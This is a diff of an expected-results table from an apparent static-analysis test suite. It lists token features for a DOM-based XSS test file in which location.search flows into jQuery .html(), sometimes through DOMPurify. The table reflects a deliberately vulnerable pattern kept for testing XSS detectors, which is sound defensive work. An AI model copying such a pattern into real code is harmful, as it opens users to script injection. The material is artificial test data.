autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14394,6 +104602,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:13:6:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:13:6:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:13:6:16 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:13:6:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:13:6:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14401,6 +104614,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:18:6:23 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:13 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:13 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:13 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:13 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:13 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted = target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted = target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted = target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted = target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:7:8:22 | tainted = target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:17:8:22 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:17:8:22 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:17:8:22 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:17:8:22 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:8:17:8:22 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:3 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | $('myId ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | $('myId ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | $('myId ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | $('myId ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | $('myId ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | exceptional return of $('myId ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | exceptional return of $('myId ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | exceptional return of $('myId ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | exceptional return of $('myId ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:3:9:25 | exceptional return of $('myId ... ainted) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14408,6 +104671,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:5:9:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:13:9:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:13:9:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:13:9:16 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:13:9:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:13:9:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14415,6 +104683,86 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:9:18:9:24 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:10:7:10:14 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:10:7:10:14 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:10:7:10:14 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:10:7:10:14 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:10:7:10:14 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:11 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:11 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:11 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:11 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:11 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:5:11:41 | tainted ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:23 | DOMPurify | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:23 | DOMPurify | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:23 | DOMPurify | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:23 | DOMPurify | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:23 | DOMPurify | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:32 | DOMPurify.sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:32 | DOMPurify.sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:32 | DOMPurify.sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:32 | DOMPurify.sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:32 | DOMPurify.sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | DOMPuri ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | DOMPuri ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | DOMPuri ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | DOMPuri ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | DOMPuri ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | exceptional return of DOMPuri ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | exceptional return of DOMPuri ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | exceptional return of DOMPuri ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | exceptional return of DOMPuri ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:15:11:41 | exceptional return of DOMPuri ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:25:11:32 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:25:11:32 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:25:11:32 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:25:11:32 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:11:25:11:32 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | tainted | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | tainted | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:3 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | $('myId ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | $('myId ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | $('myId ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | $('myId ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | $('myId ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | exceptional return of $('myId ... ainted) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | exceptional return of $('myId ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | exceptional return of $('myId ... ainted) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | exceptional return of $('myId ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:3:13:25 | exceptional return of $('myId ... ainted) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14422,6 +104770,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:5:13:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:13:13:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:13:13:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:13:13:16 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:13:13:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:13:13:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:13:18:13:24 | tainted | CalleeFlexibleAccessPath | $().html | | 